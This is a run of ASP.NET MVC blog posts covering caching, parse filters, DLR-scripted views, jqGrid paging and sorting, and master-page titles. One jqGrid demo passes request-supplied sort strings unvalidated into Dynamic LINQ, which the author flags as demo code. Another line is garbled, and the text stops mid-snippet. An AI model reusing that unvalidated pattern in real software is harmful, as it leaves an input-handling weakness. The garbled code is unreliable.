Since the output caching doesn’t happen until the view rendering phase, if the view data intended for the partial view is costly to put together, then you haven’t really saved much because the action method which provides the data to the partial view will run on every request and thus recreate the partial view data each time.

In that case, you want to hand cache the data for the partial view so you don’t have to recreate it each time. One crazy idea we might consider (thinking out loud here) is to allow associating output cache metadata to some bit of view data. That way, you could create a bit of view data specifically for a partial view and the partial view would automatically output cache itself based on that view data.

This would have to work in tandem with some means to specify that the bit of view data intended for the partial view is only recreated when the output cache is expired for that partial view, so we don’t incur the cost of creating it on every request.

In the RenderAction case, you really do get all the benefits of output caching because the action method you are rendering inline won’t get called from the view if the ViewUserControl is outputcached.

I’ve put together a small demo which demonstrates this concept in case the instructions here are not clear enough. Enjoy!

comments edit

A while back a young developer emailed me asking for advice on what it takes to become a successful developer. I started to respond,

I don’t know. Why don’t you go ask a successful developer?

web - credits:
http://www.sxc.hu/photo/885310 But then I thought, that’s kind of snarky, isn’t it? And who am I kidding with all that false modesty? After all, the concept of a “clever hack” was named after me, but the person who came up with it didn’t have 1/10 of my awesomeness which is exceedingly apparent given the off-by-one error that dropped one of the “a”s from the phrase when it was coined. This, of course, was all before I invented TDD, the Internet, and breathing air.

(note to the humor impaired, I didn’t really invent TDD)

But as I’m apt to do, I digress…

I started thinking about the question a bit and said to myself, “If I were a successful developer, what would have I done to become that?” As I started brainstorming ideas, one thing that really stood out was joining an open source project.

If one thing in my career has paid dividends, it was getting involved with open source projects. It exposed me to such a diverse set of problems and technologies that I wouldn’t normally get a chance to work on at work.

Now before I go further, this post is not the post where I answer the young developer’s question. No, that’s a post for another time. I’ll probably give it some trite and pompous title like “Advice for a young developer.” I mean, c’mon! How pathetic and self absorbed is that title? “Get over yourself!” I’ll say to the mirror. But the guy in the mirror will probably do it anyways, but in reverse.

No, this is not that post. Rather, this post is a digression from that post, because if I’m good at one thing, it’s digressing.

As I thought about the open source thing, I got to thinking about the first open source project I ever worked on – RSS Bandit (w00t w00t!). RSS Bandit is a kick butt RSS aggregator developed by Dare Obasanjo and Torsten Rendelmann. I had just started to get into blogging at the time and was really impressed by Dare’s outspoken and yet very thoughtful blog as well as by his baby at the time, RSS Bandit (he has a real baby now, congrats man!).

I hadn’t done much Windows client development back then. I was mostly building web applications in classic ASP and then early versions of ASP.NET. I figured that it would be exciting to cut my teeth on RSS Bandit and learn Winforms development in the process. The idea of a stateful programming model had me positively giddy with excitement. This was going to be so cool.

Many new developers approaching an open source project have grand visions of implementing shiny amazing new features that will have the crowds roaring, the President naming a holiday after you, and all your enemies realizing the errors of their ways and naming their children after you.

But a good contributor swallows his or her pride and starts off slowly with something smaller in scope, and more grunt work like in nature. Most OSS projects have a real need for documentation, partly because all the glamour is in implementing features so nobody wants to write the documentation.

That’s where I started. I wrote an article for the docs, getting started with RSS Bandit. Dare took a notice and asked if I would contribute to the documentation, which I gladly agreed to do. He gave me commit access (I believe I was the third after Dare and Torsten to get commit rights) and started working very hard on the documentation. In fact, much of what I wrote is still there as you can see in my narcissistic application screenshots I used. ;)

Over time, I gained more and more trust and was allowed to work on some bug fixes and features. My first main feature was implementing configurable keyboard shortcuts, which was really neat to implement.

(A bit of trivia. I worked with these guys for years on RSS Bandit, but never met Dare in person until this past Mix conference in Las Vegas. Seriously! I’ve yet to meet Torsten who lives in Germany.)

I really loved working on RSS Bandit and it became quite a hobby that took up what little was left of my free time. I guess you could say it kept me out of gangs in the hard streets of Los Angeles, not that I tried to join nor would they accept me. Over time though, I learned something. Despite all that initial giddiness over finally getting to program in a stateful environment…

I realized I didn’t like it.

In fact, I found it quite foreign and challenging. I kept running into weird problems where controls still had the state they had before after a user clicked a button. I would think to myself, “why do I have to clear that state myself? Why doesn’t it just go away when the user takes an action?” I realized my problem was that I was thinking like a web programmer, not a client programmer who took these things for granted.

As challenging as a client programmer finds the web, where you have to recreate the state on each request because the web is stateless, a developer who primarily programs the web sometimes finds client development challenging because the state is like that ugly sidekick next to the hot one at a bar – it…just…won’t…go…away.

I realized then, that I’m just a web developer at heart and I’d rather make web, not war. It was around that time that I started the Subtext project where I felt more in my element working on a web application. Eventually, I stopped using RSS Bandit preferring a web based solution in Google Reader, ironically, because the state of my feeds is always there, in the cloud, without me needing to synchronize or install an app when I’m at a new computer.

So while I actually like (or maybe am just accustomed to) the stateless programming model of the web, I’m also attracted to the statefulness of web applications as a whole in that the state of my data is not tied to any one machine but it’s stored centrally where I can easily get to it from anywhere (which yes, has its own concerns and problems such as when the net is down).

At the same time, I do check in now and then to see how RSS Bandit is progressing. There are very cool features that it has that I miss out on with Google Reader such as the ability to comment directly from the aggregator via the Comment API and the ability to subscribe to authenticated feeds. And I think Dare’s taking RSS Bandit into compelling new directions.

All this is to say that if you want to become a better developer, join an open source project (such as this one :) because it might just show you exactly what type of developer you are at heart. As I learned, I’m a web developer at heart.

comments edit

lockdownAs I’m sure you know, we developers are very particular people and we like to have things exactly our way. How else can you explain long winded impassioned debates over curly brace placement

So it comes as no surprise that developers really care about what goes in (and behind) their .aspx files, whether they be pages in Web Forms or views in ASP.NET MVC.

For example, some developers are adamant that a page should not include server side script blocks, while others don’t want their views to contain Web Form controls. Wouldn’t it be great if you could have your views reject such code constructs?

Fortunately, ASP.NET is full of lesser known extensibility gems which can help in such situations such as the PageParseFilter. MSDN describes this class as such:

Provides an abstract base class for a page parser filter that is used by the ASP.NET parser to determine whether an item is allowed in the page at parse time.

In other words, implementing this class allows you to go along for the ride as the page parser parses the .aspx file and gives you a chance to hook into that parsing.

For example, here’s a very simple filter which blocks any script tags with the runat="server" attribute set within a page.

using System;
using System.Web.UI;

public class MyPageParserFilter : PageParserFilter {
  public override bool ProcessCodeConstruct(CodeConstructType codeType
    , string code) {
    if (codeType == CodeConstructType.ScriptTag) {
      throw new InvalidOperationException("Say NO to server script blocks!");
    }
    return base.ProcessCodeConstruct(codeType, code);
  }

  public override bool AllowCode {
    get {
      return true;
    }
  }

  public override bool AllowControl(Type controlType, ControlBuilder builder)   {
    return true;
  }

  public override bool AllowBaseType(Type baseType) {
    return true;
  }

  public override bool AllowServerSideInclude(string includeVirtualPath) {
    return true;
  }

  public override bool AllowVirtualReference(string referenceVirtualPath
    , VirtualReferenceType referenceType) {
    return true;
  }

  public override int NumberOfControlsAllowed {
    get {
      return -1;
    }
  }

  public override int NumberOfDirectDependenciesAllowed {
    get {
      return -1;
    }
  }
}

Notice that we had to override some defaults for other properties we’re not interested in such as NumberOfControlsAllowed or we’d get the default of 0 which is not what we want in this case.

To apply this filter, just specify it in the <pages /> section of web.config like so:

<pages 
  pageParserFilterType="Namespace.MyPageParserFilter, AssemblyName">

Applying a parse filter for Views in ASP.NET MVC is a bit trickier because it already has a parse filter registered, ViewTypeParserFilter, which handles part of the voodoo black magic in order to remove the need for code-behind in views when using a generic model type. Remember those particular developers I was talking about?

Suppose we want to prevent developers from using server controls which make no sense in the context of an ASP.NET MVC view. Ideally, we could simply inherit from ViewTypeParserFilter and make our change so we don’t lose the existing view functionality.

That type is internal so we can’t simply inherit it. Fortunately, what we can do is simply grab the ASP.NET MVC source code for that type, rename the type and namespace, and then change it to meet our needs. Once we’re done, we can even share those changes with others. This is one of the benefits of having an open source license for ASP.NET MVC.

WARNING: The fact that we implement a ViewTypeParserFilter is an implementation detail. The goal is that in the future, we wouldn’t need this filter to provide the nice generic syntax. So what I’m about to show you might be made obsolete in the future and should be done at your own risk. It’s definitely running with scissors.

In my demo, I copied the following files to my project:

  • ViewTypeParserFilter
  • ViewTypeControlBuilder
  • ViewPageControlBuilder
  • ViewUserControlControlBuilder

I then created a new parser filter which inherits the ViewTypeParserFilter and overrode the AllowControl method like so:

public override bool AllowControl(Type controlType, ControlBuilder builder) {
  return (controlType == typeof(HtmlHead) 
    || controlType == typeof(HtmlTitle)
    || controlType == typeof(ContentPlaceHolder)
    || controlType == typeof(Content)
    || controlType == typeof(HtmlLink));
}

This will block adding any control except for those necessary in creating a typical view. You can imagine later adding some easy way of configuring that list in case you do later allow other controls.

Once we’ve implemented this new filter, we can edit the Web.config file within the Views directory to set the parser filter to this one.

This is a powerful tool for hooking into the parsing of a web page, so do be careful with it. As you might expect, I have a very simple demo of this feature here.

comments edit

At long last, the book that I worked on with Scott Hanselman, Rob Conery, and Scott Guthrie is in stock at Amazon.com.

To commemorate the book being available, the two Scotts worked very hard to convert the free eBook of chapter 1 (the end-to-end walkthrough) from the PDF into a series of HTML articles.

This is a great series which walks through the construction of the NerdDinner website. It touches upon most of the day-to-day aspects of ASP.NET MVC that you’ll want to know. It’s a great way to start understanding how the pieces largely fit together.

The rest of the book is for those who want to drill deep into the details of how the framework works. We tried to pepper the book with notes and anecdotes from the product team in a style similar to the annotations in the Framework Design Guidelines book. If you’re looking for reasons not to buy the book, see Rob’s post.

extended-forehead-editionThe bad news is that despite our heroic efforts in which we cajoled, begged, and pleaded and rendered our clothes asunder, we were not able to convince our editors to produce a special platinum extended forehead edition of the book. I really thought we could we charge extra for the limited edition cover and make gangbusters. I’ll just post it here so you can see for yourself. Click on it for a larger view.

code, asp.net mvc, dlr comments edit

Say you’re building a web application and you want, against your better judgment perhaps, to allow end users to easily customize the look and feel – a common scenario within a blog engine or any hosted application.

With ASP.NET, view code tends to be some complex declarative markup stuck in a file on disk which gets compiled by ASP.NET into an assembly. Most system administrators would first pluck out their own toenail rather than allow an end user permission to modify such files.

It’s possible to store such files in the database and use a VirtualPathProvider to load them, but that requires your application (and thus their views) to run in full trust. Is there a way you could safely store such views in the database in an application running in medium trust where the code in the view is approachable?

At the ALT.NET conference a little while back, Jimmy Schementi and John Lam gave a talk about the pattern of hosting a scripting language within a larger application. For example, many modern 3-D Games have their high performance core engine written in C++ and Assembly. However, these games often use a scripting language, such as Lua, to write the scripts for the behaviors of characters and objects.

An example that might be more familiar to more people is the use of VBA to write macros for Excel. In both of these cases, the larger application hosts a scripting environment that allow end users to customize the application using a simpler lighter weight language than the one the core app is written in.

A long while back, I wrote a blog post about defining ASP.NET MVC Views in IronRuby followed by a full IronRuby ASP.NET MVC stack. While there was some passionate interest by a few, in general, I was met with the thunderous sound of crickets. Why the huge lack of interest? Probably because I didn’t really sell the benefit and the explain the pain it solves. I’m sure many of you were asking, Why bother? What’s in it for me?

After thinking about it some more, I realized that my prototypes appeared to suggest that if you want to take advantage of IronRuby, you would need to make some sort of wholesale switch to a new foreign language, not something to be undertaken lightly.

This is why I really like Jimmy and John’s recent efforts to focus on showing the benefits of hosting the DLR for scripting scenarios like the ones mentioned above. It makes total sense to me when I look at it in this perspective. The way I see it, most developers spend a huge bulk of their time in a single core language, typically their “language of choice”. For me, I spend the bulk of my time writing C# code.

However, I don’t think twice about the fact that I also write tons of JavaScript when I do web development, and I’ll write the occasional VB code when I need a new Macro for Visual Studio or Excel. I also write SQL when I need to. I’m happy to pick up and use a new language when it will enable me to do the job at hand more efficiently and naturally than C# does. I imagine many developers feel this way. The occasional use of a scripting languages is fine when it gets the job done and I can still spend most of my time in my favorite language.

So I started thinking about how that might work in a web application. What if you could write all your business logic and controller logic in your language of choice, but have your views written in a light weight scripting language. If my web application were to host a scripting engine, I could actually store the code in any medium I want, such as the database. Having them in the database makes it very easy for end users to modify it since it wouldn’t require file upload permissions into the web root.

This is where hosting the DLR is a nice fit. I put together a proof of concept for these ideas. This is just a prototype intended to show how such a workflow might work. In this prototype, you go about creating your models and controllers the way you normally would.

For example, here’s a controller that returns some structured data to the view in the form of an anonymous type.

public ActionResult FunWithScripting()
{
  var someData = new { 
    salutation = "Are you having fun with scripting yet?", 
    theDate = DateTime.Now,
      numbers = new int[] { 1, 2, 3, 4 } 
  };

  return View(someData);
}

Once you write your controller, but before you create your view, you compile the app and then go visit the URL.View does not exist
view

We haven’t created the view yet, so let’s follow the instructions and login. Afterwards, we this:

view
editor

Since the view doesn’t exist, I hooked in and provided a temporary view for the controller action which contains a view editor. Notice that at the bottom of the screen, you can see the current property names and values being passed to the view. For example, there’s an enumeration of integers as one property, so I was able to use the Ruby each method to print them out in the view.

The sweet little browser based source code editor is named Edit Area created by Christophe Dolivet. Unfortunately, at the time I write this, it doesn’t yet have support for ERB style syntax highlighting schemes. That’s why the <% and %> aren’t highlighted in yellow.

When I click Create View, I get taken back to the request for the same action, but now I can see the view I just created (click to enlarge).

Fun with scripting
view

In the future, I should be able to host C# views in this way. Mono already has a tool for dynamically compiling C# code passed in as a string which I could try and incorporate.

I’m seriously thinking of making this the approach for building skins in a future version of Subtext. That would make skin installation drop dead simple and not require any file directory access. Let me know if you make use of this technique in your applications.

If you try and run this prototype, please note that there are some quirky caching issues with editing existing views in the prototype. It’ll seem like your view is not being edited, but it’s a result of how views are being cached. It might take a bit of time before your edits show up. I’m sure there are other bugs I’m still in the process of fixing. But for the most part, the general principle is sound.

You can download the prototype here.

comments edit

Because of all the travel I did last year as well as the impending new addition to the family this year, I drastically cut down on my travel this year. There are only two conferences outside of Redmond I planned to speak at, one was Mix (see the links to videos of my talks) and the next one is the Norwegian Developer Conference also known as the NDC.

NDC_logo-2009Hanselman spoke at this conference last year and tells me it’s a good one. Besides, it’s in Norway! I’ve travelled through Norway once during college, taking a train from Oslo to Bergen, riding a boat on the fjords, and enjoying the profound natural beauty of the country. I guess I have a thing for cold places. :)

I’m pretty excited about the speaker line-up which includes a lot of great .NET and ALT.NET speakers you know and love. But what’s really got me perked up are the speakers outside of the typical .NET conference lineup.

One of my favorite conferences last year was Google IO which was a refreshing change of pace for me. For the NDC, I requested to stay an extra day so I could make sure to catch sessions by Mary Poppendieck, Robert “Uncle Bob” Martin, and Michael Feathers among others.

It looks like all my talks are on Day 1 of the conference. I’ll be upda’ting my Black Belt Ninja Tips ASP.NET MVC talk, talking about Ajax in the context of ASP.NET MVC, and giving a joint talk with Scott Hanselman which we’re still figuring out the exact details on.

My only concern is whether I need to worry if Jeremy Miller is going to try and express his man love for me while there. ;) Kidding aside, I’m approaching with a mind ready to absorb knowledge. If you’re in the area, definitely consider this as a conference to check out. It should be fun!

comments edit

What responsibility do we have as software professionals when we post code out there for public consumption?

I don’t have a clear cut answer in my mind, but maybe you can help me formulate one. :)

For example, I recently posted a sample on my blog intended to show how to use jQuery Grid with ASP.NET MVC.

The point of the sample was to demonstrate shaping a JSON result for the jQuery grid’s consumption. For the sake of illustration, I wanted the action method to be relatively self contained so that a reader would quickly understand what’s going on in the code without having to jump around a lot.

Thus the code takes some shortcuts with data access, lack of exception handling, and lack of input validation. It’s pretty horrific!

Now before we grab the pitchforks (and I did say “we” intentionally as I’ll join you) to skewer me, I did preface the code with a big “warning, DEMO CODE AHEAD” disclaimer and so far, nobody’s beaten me up too bad about it, though maybe by writing this I’m putting myself in the crosshairs.

Even so, it did give me pause to post the code the way I did. Was I making the right trade-off in sacrificing code quality for the sake of blog post demo clarity and brevity?

In this particular case, I felt it was worth it as I tend to categorize code into several categories. I’m not saying these are absolutely correct, just opening up my cranium and giving you a peek in my head about how I think about this:

  • Prototype Code – Code used to hash out an idea to see if it’s feasible or as a means of learning a new technology. Often very ugly throwaway code with little attention paid to good design.
  • Demo Code – Code used to illustrate a concept, especially in a public setting. Like prototype code, solid design is sometimes sacrificed for clarity, but these sacrifices are deliberateand intentional, which is very important. My jQuery Grid demo above is an example of what I mean.
  • Sample Code – Very similar to demo code, the difference being that good design principles should be demonstrated for the code relevant to the concept the sample is demonstrating. Code irrelevant to the core concept might be fine to leave out or have lower quality. For example, if the sample is showing a data access technique, you might still leave out exception handling, caching, etc… since it’s not the goal of the sample to demonstrate those concepts.
  • Production Code – Code you’re running your business on, or selling. Should be as high quality as possible given your constraints. Sometimes, shortcuts are taken in the short run (incurring technical debt) with the intention of paying down the debt ASAP.
  • Reference Code – This is code that is intended to demonstrate the correct way to build an application and should be almost idealized in its embracement of good design practices.

As you might expect, the quality the audience might expect from these characterizations is not hard and fast, but dependent on context. For example, for the Space Shuttle software, I expect the Production Code to be much higher quality than production code for some intranet application.

Likewise, I think where the code is posted and by whom is can affect perception. We might expect much less from some blowhard posting code to his personal blog, ummm, like this one.

Then again, if the person claims that his example is a best practice, which is a dubious claim in the first place, we may tend to hold it to much higher standards.

Now if instead of a person, the sample is posted on an official website of a large company, say Microsoft, the audience may expect a lot more than from a personal blog post. In fact, the audience may not make the distinction between sample and reference application. This appears to be the case recently with Kobe and in the past with Oxite.

Again, this is my perspective on these things. But my views have been challenged recently via internal and external discussions with many people. So I went to the font of all knowledge where all your wildest questions are answered: Twitter. I posed the following two questions:

Do you have different quality expectations for a sample app vs a reference app?

What if the app is released by MS? Does that change your expectations?

The answers varied widely. Here’s a small sampling that represents the general tone of the responses I received.

Yes. A sample app should be quick and dirty. A reference app should exhibit best practices (error checking, logging, etc)

No, same expectations… Even I ignore what is the difference between both.

Regardless of who releases the app, my expectations don’t change.

Yes being from MS raises the bar of necessary quality, because it carries with it the weight of a software development authority.

I don’t think I have ever thought about what the difference in the two is, isn’t a sample app basically a reference app?

I don’t think most people discriminate substantively betw the words “sample” and “reference.”

Everyone, Microsoft included, should expect to be judged by everything the produce, sample or otherwise.

yes, samples do not showcase scalability or security, but ref apps do… i.e ref apps are more “enterprisey”

IMHO, sample implies a quick attempt; mostly throw-away. Ref. implies a proposed best practice; inherently higher quality.

No. We as a community should understand the difference.However MS needs to apply this notion consistently to it’s examples.

Whatever you release as sample code, is *guaranteed* to be copy-pasted everywhere - ask Windows AppCompat if you don’t believe me

Note that this is a very unscientific sampling, but there is a lot of diversity in the views being expressed here. Some people make no distinction between sample and reference while others do. Some hold Microsoft to higher standards while others hold everybody to the same standard.

I found this feedback to be very helpful because I think we tend to operate under one assumption about how our audience sees our samples, but your audience might have a completely different view. This might explain why there may be miscommunication and confusion about the community reaction to a sample.

I highlighted the last two responses because they make up the core dichotomy in my head regarding releasing samples.

On the one hand, I have tended to lean towards the first viewpoint. If code has the proper disclaimer, shouldn’t we take personal responsibility in understanding the difference?

Ever since starting work on ASP.NET MVC, we’ve been approached by more and more teams at Microsoft who are interested in sharing yet more code on CodePlex (or otherwise) and want to hear about our experiences and challenges in doing so.

When you think about it, this is a great change in what has been an otherwise closed culture. There are a lot of teams at Microsoft and the quality of the code and intent of the code will vary from team to team and project to project. I would hate to slow down that stream of sample code flowing out because some people will misunderstand its purpose and intend and cut and paste it. Yes, some of the code will be very bad, but some of it will still be worth putting out there. After all, I tend to think that if we stop giving the bad programmers bad code to cut and paste, they’ll simply write the bad code themselves. Yes, posting good code is even better, but I think that will be a byproduct of getting more code out there.

On the other hand, there’s the macro view of things to consider. People should also know not to use a hair dryer in the shower, yet they still have these funny warning labels for a reason. The fact that people shouldn’t do something sometimes doesn’t change the fact that may still do it. We can’t simply ignore that fact and the impact it may have. No matter how many disclaimers we put on our code, people will cut and paste it. It’s not so bad that a bad programmer uses bad code, but that as it propagates, the code gets confused with the right way and spreads to many programmers.

Furthermore, the story is complicated even more by the inconsistent labels applied to all this sample code, not to mention the inconsistent quality.

So What’s the Solution?

Stop shipping samples.

Nah, I’m just kidding. ;)

Some responses were along the lines of Microsoft should just post good code. I agree, I would really love it if every sample was of superb quality. I’d also like to play in a World Cup and fly without wings, but I don’t live in that world.

Obviously, this is what we should be striving for, but what do we do in the meantime? Stop shipping samples? I hope not.

Again, I don’t claim to have the answers, but I think there are a few things that could help. One twitter response made a great point:

a reference app is going to be grilled. Even more if it comes from the mothership. Get the community involved *before* it gets pub

Getting the community involved is a great means of having your code reviewed to make sure you’re not doing anything obviously stupid. Of course, even in this, there’s a challenge. Jeremy Miller made this great point recently:

We don’t have our own story straight yet.  We’re still advancing our craft.  By no means have we reached some sort of omega point in our own development efforts. 

In other words, even with community involvement, you’re probably going to piss someone off. But avoiding piss is not really the point anyways (though it’s much preferred to the alternative). The point is to be a participant in advancing the craft alongside the larger community. Others might disagree with some of your design decisions, but hopefully they can see that your code is well considered via your involvement with the community in the design process.

This also helps in avoiding the perception of arrogance, a fault that some feel is the root cause of why some of our sample apps are of poor quality. Any involvement with the community will help make it very clear that there’s much to learn from the community just as there is much to teach.

While I think getting community involved is important, I’m still on the fence on whether it must happen before its published. After all, isn’t publishing code a means of getting community involvement in the first place? As Dare says:

getting real feedback from customers by shipping is more valuable than any amount of talking to or about them beforehand

Personally, I would love for there to be a way for teams to feel free to post samples (using the definition I wrote), without fear of misconstrued intent and bad usage. Ideally in a manner where it’s clear that the code is not meant for cut and paste into real apps.

Can we figure out a way to post code samples that are not yet the embodiment of good practices in a responsible manner with the intent to improve the code quality based on community feedback? Is this even a worthy goal or should Microsoft samples just get it right the first time, as mentioned before, or don’t post at all?

Perhaps both of those are pipe dreams. I’m definitely interested in hearing your thoughts. :)

Another question I struggle with is what causes people to not distinguish between reference apps and sample apps? Is there no distinction to make? Or is this a perception problem that can be corrected with a concerted effort to make such labels consistently applied, perhaps? Or via some other means.

As you can see, I have my own preconceived notions about those things, but I’m putting them out there and challenging them based on what I’ve read recently. Please do comment and let me know your thoughts.

code, asp.net mvc comments edit

Tim Davis posted an updated version of this solution on his blog. His includes the following:

  • jqGrid 3.8.2
  • .NET 4.0 Updates
  • VS2010
  • jQuery 1.4.4
  • jQuery UI 1.8.7

Continuing in my pseudo-series of posts based on my ASP.NET MVC Ninjas on Fire Black Belt Tips Presentation at Mix (go watch it!), this post covers a demo I did not show because I ran out of time. It was a demo I held in my back pocket just in case I went too fast and needed one more demo.

A common scenario when building web user interfaces is providing a pageable and sortable grid of data. Even better if it uses AJAX to make it more responsive and snazzy. Since ASP.NET MVC includes jQuery, I figured it’d be fun to use a jQuery plugin for this demo, so I chose jQuery Grid.

After creating a standard ASP.NET MVC project, the first step was to download the plugin and to unzip the contents to my scripts directory per the Installation instructions.

jquery-grid-scripts

For the purposes of this demo, I’ll just implement this using the Index controller action and view within the HomeController.

With the scripts in place, go to the Index view and add the proper call to initialize the jQuery grid. There are three parts to this:

First, make sure to add the required script and CSS declarations.

<link rel="stylesheet" type="text/css" href="/scripts/themes/coffee/grid.css" 
  title="coffee" media="screen" />
<script src="/Scripts/jquery-1.3.2.js" type="text/javascript"></script>
<script src="/Scripts/jquery.jqGrid.js" type="text/javascript"></script>
<script src="/Scripts/js/jqModal.js" type="text/javascript"></script>
<script src="/Scripts/js/jqDnR.js" type="text/javascript"></script>

Notice that the first line contains a reference to the “coffee” CSS file. There are multiple themes included and when you choose a theme, you need to be sure to include the theme’s CSS file. I chose coffee, because I drink a lot of it.

The Second step is to initialize the grid with a bit of JavaScript. This looks a bit funky if you’re not used to jQuery, but I assure you, it’s pretty straightforward.

<script type="text/javascript">
    jQuery(document).ready(function(){ 
      jQuery("#list").jqGrid({
        url:'/Home/GridData/',
        datatype: 'json',
        mtype: 'GET',
        colNames:['Id','Votes','Title'],
        colModel :[
          {name:'Id', index:'Id', width:40, align:'left' },
          {name:'Votes', index:'Votes', width:40, align:'left' },
          {name:'Title', index:'Title', width:200, align:'left'}],
        pager: jQuery('#pager'),
        rowNum:10,
        rowList:[5,10,20,50],
        sortname: 'Id',
        sortorder: "desc",
        viewrecords: true,
        imgpath: '/scripts/themes/coffee/images',
        caption: 'My first grid'
      }); 
    }); 
</script>

There are a few things you’ll have to be sure to configure here. First is the url property which points to the URL that will provide the JSON data. Notice that the value is /Home/GridData which means we’ll be implementing an action method named GridData soon. During the course of this post, we’ll change that property to point to different action methods.

The colNames property contains the display names for each column separated by columns. Ideally it should match up with the items in the colModel property.

The colModel property is an array that is used to configure each column of the grid, allowing you to specify the width, alignment, and sortability of a column. The index property of a column is an important one as that is the value that is sent to the server when sorting on a column.

See the documentation for more details on the HTML and JavaScript used to configure the grid.

The Third step is to add a bit of HTML to the page which will house the grid.

<h2>My Grid Data</h2>
<table id="list" class="scroll" cellpadding="0" cellspacing="0"></table>
<div id="pager" class="scroll" style="text-align:center;"></div>

With this in place, it’s time to implement the GridData action method to return the JSON in the proper format.

But first, let’s take a look at the JSON format expected by the grid. From the documentation, you can see it will look something like:

{ 
  total: "xxx", 
  page: "yyy", 
  records: "zzz",
  rows : [
    {id:"1", cell:["cell11", "cell12", "cell13"]},
    {id:"2", cell:["cell21", "cell22", "cell23"]},
      ...
  ]
}

The documentation I linked to also provides some gnarly looking PHP code you can use to generate the JSON data. Fortunately, you won’t have to deal with that. By using the Json helper method with an anonymous object, we can write some relatively clean looking code which looks almost just like the spec. Here’s my first cut of the action method, just to get it to display some fake data.

public ActionResult GridData(string sidx, string sord, int page, int rows) {
  var jsonData = new {
    total = 1, // we'll implement later 
    page = page,
    records = 3, // implement later 
    rows = new[]{
      new {id = 1, cell = new[] {"1", "-7", "Is this a good question?"}},
      new {id = 2, cell = new[] {"2", "15", "Is this a blatant ripoff?"}},
      new {id = 3, cell = new[] {"3", "23", "Why is the sky blue?"}}
    }
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

A couple of things to point out. The arguments to the action methods are named according to the query string parameter names that jQuery grid sends via the Ajax request. I didn’t choose those names.

By naming the arguments to the action method exactly the same as what is in the query string, we have a very convenient way to retrieve these values. Remember, arguments passed to an action method should be treated with care.Never trust user input!

In this example, we statically create some JSON data and use the Json helper method to return the data back to the grid and Voila! It works!

jquery-grid-demo

Yeah, this is great for a simple demo, but I use a real database to store my data! Understood. It’s time to hook this up to a real database. As you might guess, I’ll use the HaackOverflow database for this demo as well as LinqToSql.

I’ll assume you know how to add a database and create a LinqToSql model already. If not, look at the source code I’ve included. Once you’ve done that, it’s pretty easy to transformat the data we get back into the proper JSON format.

public ActionResult LinqGridData    (string sidx, string sord, int page, int rows) {
  varnew HaackOverflowDataContext();

  var jsonData = new {
    total = 1, //todo: calculate
    page = page,
    records = context.Questions.Count(),
    rows = (
      from question in context.Questions
      select new {
        id = question.Id,
        cell = new string[] { 
          question.Id.ToString(), question.Votes.ToString(), question.Title 
        }
      }).ToArray()
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

Note that the method is a tiny bit busier, but it follows the same basic structure as the JSON data. After changing the JavaScript code in the view to point to this action instead of the other, we can now see the first ten records from the database in the grid.

But we’re not done yet. At this point, we want to implement paging and sorting. Paging is pretty easy, but sorting is a bit tricky. After all, what we get passed into the action method is the name of the sort column. At that point, we want to dynamically create a LINQ expression that sorts by that column.

One easy way to do this is to use the Dynamic Linq Query library which ScottGu wrote about a while back. This library adds extension methods which make it easy to create more dynamic Linq queries based on strings. Of course, with great power comes great responsibility. Make sure to validate the strings before you pass them into the methods. With this in place, we rewrite the action method to be (warning, DEMO CODE AHEAD!):

public ActionResult DynamicGridData
    (string sidx, string sord, int page, int rows) {
  var context = new HaackOverflowDataContext();
  int pageIndex = Convert.ToInt32(page) - 1;
  int pageSize = rows;
  int totalRecords = context.Questions.Count();
  int totalPages = (int)Math.Ceiling((float)totalRecords / (float)pageSize);

  var questions = context.Questions
    .OrderBy(sidx + " " + sord)
    .Skip(pageIndex * pageSize)
    .Take(pageSize);

  var jsonData = new {
    total = totalPages,
    page = page,
    records = totalRecords,
    rows = (
      from question in questions
      select new {
        id = question.Id,
        cell = new string[] {
          question.Id.ToString(), question.Votes.ToString(), question.Title 
        }
    }).ToArray()
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

Some things to note: The first part of this method does some initial calculations to figure out the number of pages we’re dealing with based on the page size (passed in) and the total record count.

Then given that info, we use the Dynamic Linq extension methods to do the actual paging and sorting via the line:

var questions = context.Questions.OrderBy(…).Skip(…).Take(…);

Once we have that, we can simply transform that into the array that jQuery grid expects and place that in the larger JSON payload represented by the jsonData variable.

With all this in place, you now have a pretty snazzy approach to paging and sorting data using AJAX. Now go forth and wow your customers. ;)

And before I forget, here’s the sample project that uses all three approaches.

personal comments edit

Every good developer knows to always have a backup. For example, over two years ago, I announced my world domination plans. But there was a single point of failure in me putting all my world domination plans on the tiny shoulders of just one progeny. My boy needs a partner in crime.

mia So my wife and I conspired together and we’re happy to announce that baby #2 is on the way. Together, the two of them will be unstoppable!

My wife is past her first trimester and we expect the baby to RTF (Release To Family) around October.

This second time around has been a bit more challenging. My poor wife, bless her heart, has had to deal with much more sever nausea this time around.

Notice the crinkle in the ultrasound photo. My son did that. ;) He’s trying to destroy the evidence.

Many of you who have more than one children might be able to relate to this, but I really considered not writing a blog announcement for my second child. There was the feeling that it was such a novel thing the first time, but now it’s becoming old hat (not really!).

But then I mentally fast forwarded 16 years later and pictured my future daughter finding the firstborn announcement and not finding her own blog announcement. Try explaining that to a kid. I can deal without the drama.

Well I won’t have to! Hi honey, here’s your announcement. Now you be good while daddy goes shopping for a shotgun and a shovel. :)

asp.net, asp.net mvc comments edit

There are a couple of peculiarities worth understanding when dealing with title tags and master pages within Web Forms and ASP.NET MVC. These assume you are using the HtmlHead control, aka <head runat="server" />.

The first peculiarity involves a common approach where one puts a ContentPlaceHolder inside of a title tag like we do with the default template in ASP.NET MVC:

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" />
  </title>
</head>
...

What’s nice about this approach is you can set the title tag from within any content page.

<asp:Content ContentPlaceHolderID="titleContent" runat="server">
  Home
</asp:Content>

But what happens if you want to set part of the title from within the master page. For example, you might want the title of every page to end with a suffix, “ – MySite”.

If you try this (notice the – MySite tacked on):

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" /> - MySite
  </title>
</head>
...

And run the page, you’ll find that the – MySite is not rendered. This appears to be a quirk of the HtmlHead control. This is because the title tag within the HtmlHead control is now itself a control. This will be familiar to those who understand how the AddParsedSubObject method works. Effectively, the only content allowed within the body of the HtmlHead control are other controls.

The fix is pretty simple. Add your text to a LiteralControl like so.

<%@ Master ... %>
<html>
<head runat="server">
  <title>
    <asp:ContentPlaceHolder ID="titleContent" runat="server" /> 
